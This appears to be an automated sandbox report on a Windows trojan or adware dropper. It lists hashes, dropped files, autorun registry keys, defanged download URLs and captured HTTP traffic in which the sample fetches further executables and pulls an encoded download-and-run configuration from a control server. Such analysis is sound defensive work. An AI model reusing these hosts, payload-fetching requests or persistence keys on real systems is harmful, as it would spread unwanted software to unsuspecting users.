Sample_0a4e761244
HEUR:Trojan.Win32.Generic (Kaspersky), mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
| Requires JavaScript enabled! |
|---|
MD5: 0a4e761244db010b90bcf2f67223ec81
SHA1: 0794e23031e9c64b8666958c368dcd522ce731b9
SHA256: 95b9baf4cade19127446a94d8e22ae3f09225d19b32a601e875b75d325ef0616
SSDeep: 1536:pJSx9j8F8BHLsJoiYSPaVSYtbS3f7KZQF:pJDFQsJoiYSidbSzKyF
Size: 53248 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: MicrosoftVisualC, NETexecutable, UPolyXv05_v6
Company: no certificate found
Created at: 2017-08-02 16:28:12
Analyzed on: Windows7 SP1 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
SecondL.exe:2936
Sho9libi.exe:3808
OneTwo.exe:3724
%original file name%.exe:2748
The Trojan injects its code into the following process(es):
43qnfuzifwk.exe:1984
%original file name%.exe:3432
GW637UYD5.exe:3836
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process SecondL.exe:2936 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Roaming\pzdoadyr40k\43qnfuzifwk.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\pzdoadyr40k\43qnfuzifwk.exe (204 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (856 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (856 bytes)
The process Sho9libi.exe:3808 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (860 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (860 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.new (860 bytes)
The Trojan deletes the following file(s):
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.3808.345433 (0 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.3808.345433 (0 bytes)
The process OneTwo.exe:3724 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\GW637UYD5K\GW637UYD5.exe (102799 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (852 bytes)
%Program Files%\GW637UYD5K\uninstaller.exe (38015 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (852 bytes)
%Program Files%\GW637UYD5K\GW637UYD5.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.new (852 bytes)
%Program Files%\GW637UYD5K\uninstaller.exe.config (1 bytes)
The Trojan deletes the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.3724.342905 (0 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.3724.342905 (0 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.3724.342905 (0 bytes)
The process %original file name%.exe:3432 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\1O4LXPA5DC\SecondL.exe (657 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\1O4LXPA5DC\OneTwo.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\1O4LXPA5DC\SecondL.exe.config (1 bytes)
C:\config.conf (47 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\1O4LXPA5DC\Sho9libi.exe (234441 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\1O4LXPA5DC\Sho9libi.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\1O4LXPA5DC\OneTwo.exe (4874 bytes)
The process GW637UYD5.exe:3836 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\GW637UYD5K\cast.config (38 bytes)
Registry activity
The process SecondL.exe:2936 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASAPI32]
"EnableConsoleTracing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASAPI32]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASMANCS]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASAPI32]
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASMANCS]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASAPI32]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASMANCS]
"EnableFileTracing" = "0"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process Sho9libi.exe:3808 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\Sho9libi_RASAPI32]
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\Sho9libi_RASMANCS]
"MaxFileSize" = "1048576"
"EnableFileTracing" = "0"
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\Sho9libi_RASAPI32]
"EnableConsoleTracing" = "0"
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\Sho9libi_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"
The process 43qnfuzifwk.exe:1984 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"vwh5vg5nlkn" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\pzdoadyr40k\43qnfuzifwk.exe"
The process OneTwo.exe:3724 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\OneTwo_RASAPI32]
"EnableConsoleTracing" = "0"
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\OneTwo_RASAPI32]
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\OneTwo_RASMANCS]
"EnableConsoleTracing" = "0"
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\OneTwo_RASAPI32]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\OneTwo_RASMANCS]
"FileTracingMask" = "4294901760"
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\OneTwo_RASAPI32]
"EnableFileTracing" = "0"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process %original file name%.exe:2748 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process %original file name%.exe:3432 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\0a4e761244db010b90bcf2f67223ec81_RASAPI32]
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\0a4e761244db010b90bcf2f67223ec81_RASMANCS]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\0a4e761244db010b90bcf2f67223ec81_RASAPI32]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\0a4e761244db010b90bcf2f67223ec81_RASMANCS]
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\0a4e761244db010b90bcf2f67223ec81_RASAPI32]
"FileTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\0a4e761244db010b90bcf2f67223ec81_RASAPI32]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\0a4e761244db010b90bcf2f67223ec81_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\0a4e761244db010b90bcf2f67223ec81_RASAPI32]
"ConsoleTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\0a4e761244db010b90bcf2f67223ec81_RASAPI32]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\0a4e761244db010b90bcf2f67223ec81_RASMANCS]
"MaxFileSize" = "1048576"
"EnableConsoleTracing" = "0"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"OMEWPRODUCT_HC6YU" = "C:\%original file name%.exe"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process GW637UYD5.exe:3836 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\GW637UYD5_RASAPI32]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\GW637UYD5_RASMANCS]
"FileTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\GW637UYD5_RASAPI32]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\GW637UYD5_RASMANCS]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\GW637UYD5_RASAPI32]
"MaxFileSize" = "1048576"
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\GW637UYD5_RASMANCS]
"EnableConsoleTracing" = "0"
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\GW637UYD5_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\GW637UYD5_RASMANCS]
"EnableFileTracing" = "0"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"T9DKARE21ZIDH36" = "%Program Files%\GW637UYD5K\GW637UYD5.exe"
Dropped PE files
| MD5 | File path |
|---|---|
| 7acb7f745b888e5090f5bed46121bcc5 | c:\Program Files\GW637UYD5K\GW637UYD5.exe |
| f4164d03570861bdbaa5147023e2f7a9 | c:\Program Files\GW637UYD5K\uninstaller.exe |
| 5282865d2c3ac1cca59c8c622a2a3fc0 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\1O4LXPA5DC\OneTwo.exe |
| 3164f6f1e1bf642a17038ec9ead0211b | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\1O4LXPA5DC\SecondL.exe |
| 61c6cde3af1416d2530c3f119ac131f6 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\1O4LXPA5DC\Sho9libi.exe |
| 34817ecb1377edb1df38a90a885f8c5d | c:\Users\"%CurrentUserName%"\AppData\Roaming\pzdoadyr40k\43qnfuzifwk.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
Company Name: SZH4X69@
Product Name: SZH4X6
Product Version: 2.8.1.8
Legal Copyright: Copyright (c) 9091
Legal Trademarks:
Original Filename: JAY789007Z66Z.exe
Internal Name: JAY789007Z66Z.exe
File Version: 2.8.1.8
File Description: SZH4X
Comments: SZH4X69
Language: Language Neutral
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 8192 | 47400 | 47616 | 4.3036 | 59cfaa2e95598673b854938d31e1b37e |
| .rsrc | 57344 | 4484 | 4608 | 3.5262 | 53613a5469f1c441ac893ee24067f808 |
| .reloc | 65536 | 12 | 512 | 0.056519 | 0ae5f06e2287ad7bd67561367741827a |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
| URL | IP |
|---|---|
| hxxp://www.wizzmonetize.com/remotes_xml_sections.php | |
| hxxp://bratitlamio.com/from_backup/747474/AdsShow_installer.exe | |
| hxxp://bratitlamio.com/3/000000/wizzcaster_installer_v2.exe | |
| hxxp://bratitlamio.com/exe/updater.exe | |
| hxxp://bratitlamio.com/safe_download/582369/AdsShow.exe | |
| hxxp://bratitlamio.com/download/3/wizzcaster_v2.exe | |
| hxxp://www.wizzmonetize.com/wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_load | |
| hxxp://www.wizzmonetize.com/wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_notok | |
| hxxp://bratitlamio.com/download/3/wizzcaster_uninstaller_v2.exe | |
| hxxp://www.wizzmonetize.com/api/v5/config | |
| hxxp://www.wizzmonetize.com/api/v5/link | |
| hxxp://agent.wizztrakys.com/wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_notok | |
| hxxp://agent.wizztrakys.com/wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_load | |
| hxxp://ladomainadeserver.com/api/v5/config |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET POLICY PE EXE or DLL Windows file download HTTP
Traffic
GET /download/3/wizzcaster_v2.exe HTTP/1.1
Host: bratitlamio.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 28 Aug 2017 21:45:58 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="wizzcaster_v2.exe"
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload129000..MZ......................@.....................................
..........!..L.!This program cannot be run in DOS mode....$.......PE..
L....w.Y.........."...0.................. ........@.. ................
....................@.................................t...O...........
........................<..........................................
...... ............... ..H............text........ ...................
... ..`.rsrc...............................@..@.reloc.................
.............@..B........................H.......x"...............2..
...........................................&..(.....*...0..@.........(
......~....o......s......o......o......o....................*........4
5.......0............s................*................~r...p.....rC..
p.....r]..p.....*&.(......*...0..9........~.........,".r...p.....(....
o....s............~..... ..*....0...........~..... ..*".......*.0.....
......~..... ..*".( ....*Vs....(!...t.........*...0............(....("
....~....("....~....("....(......o#.........io$.....(%.....o&.......("
.......('.......o(...r...po)......o*...t"..............%...o ...&.....
....*..................".(.....*...BSJB............v2.0.50727......l..
.....#~..,...d...#Strings............#US.l.......#GUID...|...(...#Blob
...........WU.........3........ ................... ..................
.....................................~.5.....5................./...a./
...B./...../...../...../...../.........:......./... .....&....._.E....
...........<./.........o.....A...........H.....y.......5.....U.<<< skipped >>>
GET /download/3/wizzcaster_uninstaller_v2.exe HTTP/1.1
Host: bratitlamio.com
HTTP/1.1 200 OK
Date: Mon, 28 Aug 2017 21:46:00 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="wizzcaster_uninstaller_v2.exe"
Transfer-Encoding: chunked
Content-Type: application/x-msdownload78a00..MZ......................@......................................
.........!..L.!This program cannot be run in DOS mode....$.......PE..L
....w.Y.........."...0.................. ........@.. .................
...................@.................................T...O.......4....
......................................................................
.. ............... ..H............text........ ......................
..`.rsrc...4...........................@..@.reloc.....................
.........@..B........................H.......x"...............2.......
.......................................&..(.....*...0..@.........(....
..~....o......s......o......o......o....................*........45...
....0............s................*................~r...p.....rC..p...
..r]..p.....*&.(......*...0..9........~.........,".r...p.....(....o...
.s............~..... ..*....0...........~..... ..*".......*.0.........
..~..... ..*".( ....*Vs....(!...t.........*...0............(....("....
~....("....~....("....(......o#.........io$.....(%.....o&.......("....
...('.......o(...r...po)......o*...t"..............%...o ...&.........
*..................".(.....*...BSJB............v2.0.50727......l......
.#~..,...d...#Strings............#US.l.......#GUID...|...(...#Blob....
.......WU.........3........ ................... ......................
.................................~.5.....5................./...a./...B
./...../...../...../...../.........:......./... .....&....._.E........
.......<./.........o.....A...........H.....y.......5.....U...V.<<< skipped >>>
POST /remotes_xml_sections.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: VVV.wizzmonetize.com
Content-Length: 169
Expect: 100-continue
Connection: Keep-Alive
HTTP/1.1 100 Continue
....
remote_id=1&user_name=wemonetize&api_key=e721cfcc-2148-11e6-922f-0cc47
a47968c&buying_product_name=DefaultProduct&buying_partner_name=Default
Partner&buying_channel_name=1
HTTP/1.1 200 OK
Date: Mon, 28 Aug 2017 21:45:52 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=hkrl9l8ht38m50qetpvqegdnq1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1608
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8PHVwZGF0ZXMgcmVmcmVzaD0iMTIwIj4KCjx0YXNrPg0KDQo8cGVyZm9ybT4NCg0KPGRvd2
5sb2FkIG5hbWU9IlNlY29uZEwiIHZhbHVlPSJodHRwOi8vYnJhdGl0bGFtaW8uY29tL2Zy
b21fYmFja3VwLzc0NzQ3NC9BZHNTaG93X2luc3RhbGxlci5leGUiIHZlcnNpb249IiIgIH
NvZnR3YXJlPSIiIG5ldD0ieWVzIiAvPg0KPHByb2Nlc3MgdHlwZT0ic3RhcnQiIG5hbWU9
IlNlY29uZEwiIHZhbHVlPSJub3R3YWl0IiBwYXJhbXM9Im5pbXBvcnRlIi8 DQo8bW9kIH
R5cGU9ImFkZCIgbmFtZT0iUXNPbmUiIHZhbHVlPSIxNzA4MjgiLz4NCg0KPC9wZXJmb3Jt
Pg0KDQo8Y29uZGl0aW9ucz4NCg0KPG1vZCB0eXBlPSJjaGVjayIgbmFtZT0iUXNPbmUiIH
ZhbHVlPSI0NTE3MDgyOCIgbWF0Y2g9ImZhbHNlIi8 DQoNCjwvY29uZGl0aW9ucz4NCjwv
dGFzaz48dGFzaz4NCg0KPHBlcmZvcm0 DQoNCjxkb3dubG9hZCBuYW1lPSJPbmVUd28iIH
ZhbHVlPSJodHRwOi8vYnJhdGl0bGFtaW8uY29tLzMvMDAwMDAwL3dpenpjYXN0ZXJfaW5z
dGFsbGVyX3YyLmV4ZSIgdmVyc2lvbj0iIiAgc29mdHdhcmU9IiIgbmV0PSJ5ZXMiIC8 DQ
o8cHJvY2VzcyB0eXBlPSJzdGFydCIgbmFtZT0iT25lVHdvIiB2YWx1ZT0ibm90d2FpdCIg
cGFyYW1zPSI1N2E3NjRkMDQyYmY4Ii8 DQo8bW9kIHR5cGU9ImFkZCIgbmFtZT0iSGFoYS
IgdmFsdWU9IjAwMDE3MDgyOCIvPg0KDQo8L3BlcmZvcm0 DQoNCjxjb25kaXRpb25zPg0K
DQo8bW9kIHR5cGU9ImNoZWNrIiBuYW1lPSJIYWhhIiB2YWx1ZT0iMTcwODI4IiBtYXRjaD
0iZmFsc2UiLz4NCg0KPC9jb25kaXRpb25zPg0KPC90YXNrPjx0YXNrPg0KDQo8cGVyZm9y
bT4NCg0KPGRvd25sb2FkIG5hbWU9IlNobzlsaWJpIiB2YWx1ZT0iaHR0cDovL2JyYXRpdG
xhbWlvLmNvbS9leGUvdXBkYXRlci5leGUiIHZlcnNpb249IiIgIHNvZnR3YXJlPSIiIG5l
dD0ieWVzIiAvPg0KPHByb2Nlc3MgdHlwZT0ic3RhcnQiIG5hbWU9IlNobzlsaWJpIiB2YW
x1ZT0id2FpdCIgcGFyYW1zPSJ3ZSIvPg0KPG1vZCB0eXBlPSJhZGQiIG5hbWU9IkRhdGUi
IHZhbHVlPSJmZThmMTcwODI4Ii8 DQoNCjwvcGVyZm9ybT4NCg0KPGNvbmRpdGlvbnM DQ
oNCjxtb2QgdHlwZT0iY2hlY2siIG5hbWU9IkRhdGUiIHZhbHVlPSIxNzA4MjgiIG1h<<< skipped >>>
GET /from_backup/747474/AdsShow_installer.exe HTTP/1.1
Host: bratitlamio.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 28 Aug 2017 21:45:55 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="AdsShow_installer.exe"
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload2a00..MZ......................@.......................................
........!..L.!This program cannot be run in DOS mode....$.......PE..L.
.....Y.........."...0.............B=... ...@....@.. ..................
..................@..................................<..O....@..L..
..................`.......;...........................................
.... ............... ..H............text...H.... .....................
. ..`.rsrc...L....@....... ..............@..@.reloc.......`.......(...
...........@..B................$=......H........#..8............;.....
..........................................0..%.............(....(....r
...pr...po....(......(....&.(....r...pr...po....r...p(....(........ T.
.... ..........,........ #.....3..... ......,......X......X.... X.....
....-.....X.... ..........-.... ...... ..........,.........X.... .....
.....-..(.....(...........%.r...p.%.ra..p.%.r...p.%.r...p.%.rG..p.%.r[
..p.%.rB..p.%.rR..p.%.r...p.%..r...p.%..rQ..p.%..r...p.%..r...p.%..r:.
.p.%..r...p.%..r...p.%..r...p.%..r9..p.%..rQ..p.%..r...p.%..r...p.%..r
...p.%..r...p.%..r...p.%..r...p.%..r...p.(.......r...p(......(........
......,.....(....& ..r...p(....&.........*...A........................
....0..f........r...p.r!..p... ".. ..........,...r/..p(.........X.. ..
........-.s.......rG..p(....s.....o.....r...p.*".( ....*&.( .....*....
0..9........~.........,".r...p.....(!...o"...s#...........~..... ..*..
..0...........~..... ..*".......*.0...........~..... ..*".($....*Vs...
.(%...t.........*..BSJB............v2.0.50727......l...$...#~.....<<< skipped >>>
GET /3/000000/wizzcaster_installer_v2.exe HTTP/1.1
Host: bratitlamio.com
HTTP/1.1 200 OK
Date: Mon, 28 Aug 2017 21:45:55 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="wizzcaster_installer_v2.exe"
Transfer-Encoding: chunked
Content-Type: application/x-msdownload34000..MZ......................@......................................
.........!..L.!This program cannot be run in DOS mode....$.......PE..L
....w.Y.........."...0..z............... ........@.. .................
...................@.....................................O.......4....
.......................t..............................................
.. ............... ..H............text....x... ...z..................
..`.rsrc...4............|..............@..@.reloc...............>..
............@..B........................H.......x"...............2..Xd
..........................................&..(.....*...0..@.........(.
.....~....o......s......o......o......o....................*........45
.......0............s................*................~r...p.....rC..p
.....r]..p.....*&.(......*...0..9........~.........,".r...p.....(....o
....s............~..... ..*....0...........~..... ..*".......*.0......
.....~..... ..*".( ....*Vs....(!...t.........*...0............(....(".
...~....("....~....("....(......o#.........io$.....(%.....o&.......(".
......('.......o(...r...po)......o*...t"..............%...o ...&......
...*..................".(.....*...BSJB............v2.0.50727......l...
....#~..,...d...#Strings............#US.l.......#GUID...|...(...#Blob.
..........WU.........3........ ................... ...................
....................................~.5.....5................./...a./.
..B./...../...../...../...../.........:......./... .....&....._.E.....
..........<./.........o.....A...........H.....y.......5.....U..<<< skipped >>>
GET /exe/updater.exe HTTP/1.1
Host: bratitlamio.com
HTTP/1.1 200 OK
Date: Mon, 28 Aug 2017 21:45:56 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="updater.exe"
Transfer-Encoding: chunked
Content-Type: application/x-msdownload23ca00..MZ......................@.....................................
..........!..L.!This program cannot be run in DOS mode....$.......PE..
L....w.Y.........."...0...!.........."!.. ...@!...@.. ................
.......@$...........@.................................T"!.O....@!.4...
................. $......!!...........................................
... ............... ..H............text.....!.. ....!.................
..`.rsrc...4....@!.......!.............@..@.reloc....... $.......#...
..........@..B................."!.....H.......x"...............2.... .
........................................&..(.....*...0..@.........(...
...~....o......s......o......o......o....................*........45..
.....0............s................*................~r...p.....rC..p..
...r]..p.....*&.(......*...0..9........~.........,".r...p.....(....o..
..s............~..... ..*....0...........~..... ..*".......*.0........
...~..... ..*".( ....*Vs....(!...t.........*...0............(....("...
.~....("....~....("....(......o#.........io$.....(%.....o&.......("...
....('.......o(...r...po)......o*...t"..............%...o ...&........
.*..................".(.....*...BSJB............v2.0.50727......l.....
..#~..,...d...#Strings............#US.l.......#GUID...|...(...#Blob...
........WU.........3........ ................... .....................
..................................~.5.....5................./...a./...
B./...../...../...../...../.........:......./... .....&....._.E.......
........<./.........o.....A...........H.....y.......5.....U...V<<< skipped >>>
POST /api/v5/config HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: ladomainadeserver.com
Content-Length: 38
Expect: 100-continue
Connection: Keep-Alive
HTTP/1.1 100 Continue
....
uid=57a764d042bf8&days_after_install=0
HTTP/1.1 200 OK
Date: Mon, 28 Aug 2017 21:46:00 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
Set-Cookie: laravel_session=b5cc79c83fd382120d7baeeb2d060acc8fe24619; expires=Mon, 28-Aug-2017 23:46:00 GMT; Max-Age=7200; path=/; httponly
Content-Length: 28
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8{"time_between_prints":"15"}HTTP/1.1 200 OK..Date: Mon, 28 Aug 2017 21
:46:00 GMT..Server: Apache/2.4.10 (Debian)..Cache-Control: no-cache..S
et-Cookie: laravel_session=b5cc79c83fd382120d7baeeb2d060acc8fe24619; e
xpires=Mon, 28-Aug-2017 23:46:00 GMT; Max-Age=7200; path=/; httponly..
Content-Length: 28..Keep-Alive: timeout=10, max=100..Connection: Keep-
Alive..Content-Type: text/html; charset=UTF-8..{"time_between_prints":
"15"}....
GET /safe_download/582369/AdsShow.exe HTTP/1.1
Host: bratitlamio.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 28 Aug 2017 21:45:58 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="AdsShow.exe"
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload2000..MZ......................@.......................................
........!..L.!This program cannot be run in DOS mode....$.......PE..L.
.....Y.........."...0.............N2... ...@....@.. ..................
..................@..................................1..O....@..D.....
...............`.......0..............................................
. ............... ..H............text...T.... ...................... .
.`.rsrc...D....@......................@..@.reloc.......`..............
........@..B................02......H.......("...............0........
.......................................0............s............,N.~.
...r...p.o......(....r]..pra..po....rc..p(....o....rc..p(....o......o.
..... Z.rg..p(.............,...........,.. `......o....Z(......rq..p(.
...&. `.......o....Z(......... .&....*...................0..4........r
...p..rg..p( .....,...r...p(!...("........ ... ..*".(#....*&.(#.....*.
